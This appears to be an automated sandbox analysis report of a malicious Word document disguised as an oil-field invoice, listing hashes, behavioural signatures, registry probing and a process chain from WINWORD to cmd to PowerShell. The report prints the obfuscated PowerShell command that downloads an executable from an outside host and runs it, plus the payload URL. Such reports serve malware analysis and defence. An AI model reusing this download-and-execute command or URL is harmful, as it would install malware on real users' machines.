Analysis
- max time kernel: 111s
- max time network: 130s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 14-10-2021 08:09
Behavioral tasks
- behavioral1
  Sample: Invoice- 0535254 Oil_Field_4568742.doc
  Resource: win7v20210408
- behavioral2
  Sample: Invoice- 0535254 Oil_Field_4568742.doc
  Resource: win10v20210408
General
- Target: Invoice- 0535254 Oil_Field_4568742.doc
- Size: 55KB
- MD5: e70320db1a53b3226e73d2b8124b2073
- SHA1: 119ac671f8030a7395030273931120b6e52b3d4d
- SHA256: 4821e3c96ac5b45216470c24fe904e41c6060e8b392ed6265807b4c59e6d39b1
- SHA512: c964a9a959a224d938b8251b97fe3a31483d8eca5eeaa7886450e44d048ecc30c52331158865f33e14b03f03cc7ea236ae6f69b7760eb25bb414b829a59f8df6
Malware Config
Extracted
https://secure04sd.my03.com/a/oleApp13.exe
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: cmd.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3136 | 652 | cmd.exe | WINWORD.EXE
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: WINWORD.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: WINWORD.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes: WINWORD.EXE
  pid | process
  652 | WINWORD.EXE
  652 | WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe
  pid | process
  2960 | powershell.exe
  2960 | powershell.exe
  2960 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 2960 | powershell.exe
- Suspicious use of SetWindowsHookEx (7 IoCs)
  Processes: WINWORD.EXE
  pid | process
  652 | WINWORD.EXE (7 identical entries)
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: WINWORD.EXE, cmd.exe
  description | pid | process | target process
  PID 652 wrote to memory of 3136 | 652 | WINWORD.EXE | cmd.exe
  PID 652 wrote to memory of 3136 | 652 | WINWORD.EXE | cmd.exe
  PID 3136 wrote to memory of 2960 | 3136 | cmd.exe | powershell.exe
  PID 3136 wrote to memory of 2960 | 3136 | cmd.exe | powershell.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Invoice- 0535254 Oil_Field_4568742.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (depth 2)
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\questionpolitics.cmd" "
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`ps://secure04sd.my03.com/a/oleApp13.e`xe -Destination C:\Users\Public\Documents\happyalmost.e`xe;C:\Users\Public\Documents\happyalmost.e`xe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Public\Documents\questionpolitics.cmd
  MD5: 5f4bcdc965cc9739a817de56d7ca2846
  SHA1: 24d45c0d986d4ba7074da5f671d5288626dba3c3
  SHA256: 7a16b7becdfe4e0598f559ab176ac97641ec0030b7da324b7dd2e659b20bec9d
  SHA512: 9694cdb38eba0bccf109fe036aef3067f7d132a747738b1e7284cde76e2e90cd07bf4fce5a588cc3eee9a7ffa0731efc91692232a3e83eaad797068f6803f371
- memory/652-117-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp (Filesize 64KB)
- memory/652-115-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp (Filesize 64KB)
- memory/652-114-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp (Filesize 64KB)
- memory/652-118-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp (Filesize 64KB)
- memory/652-120-0x0000028F4DE80000-0x0000028F4DE82000-memory.dmp (Filesize 8KB)
- memory/652-119-0x0000028F4DE80000-0x0000028F4DE82000-memory.dmp (Filesize 8KB)
- memory/652-121-0x0000028F4DE80000-0x0000028F4DE82000-memory.dmp (Filesize 8KB)
- memory/652-116-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmp (Filesize 64KB)
- memory/2960-274-0x000001BA76250000-0x000001BA76252000-memory.dmp (Filesize 8KB)
- memory/2960-260-0x0000000000000000-mapping.dmp
- memory/2960-275-0x000001BA76253000-0x000001BA76255000-memory.dmp (Filesize 8KB)
- memory/2960-417-0x000001BA76256000-0x000001BA76258000-memory.dmp (Filesize 8KB)
- memory/2960-418-0x000001BA76258000-0x000001BA76259000-memory.dmp (Filesize 4KB)
- memory/3136-258-0x0000000000000000-mapping.dmp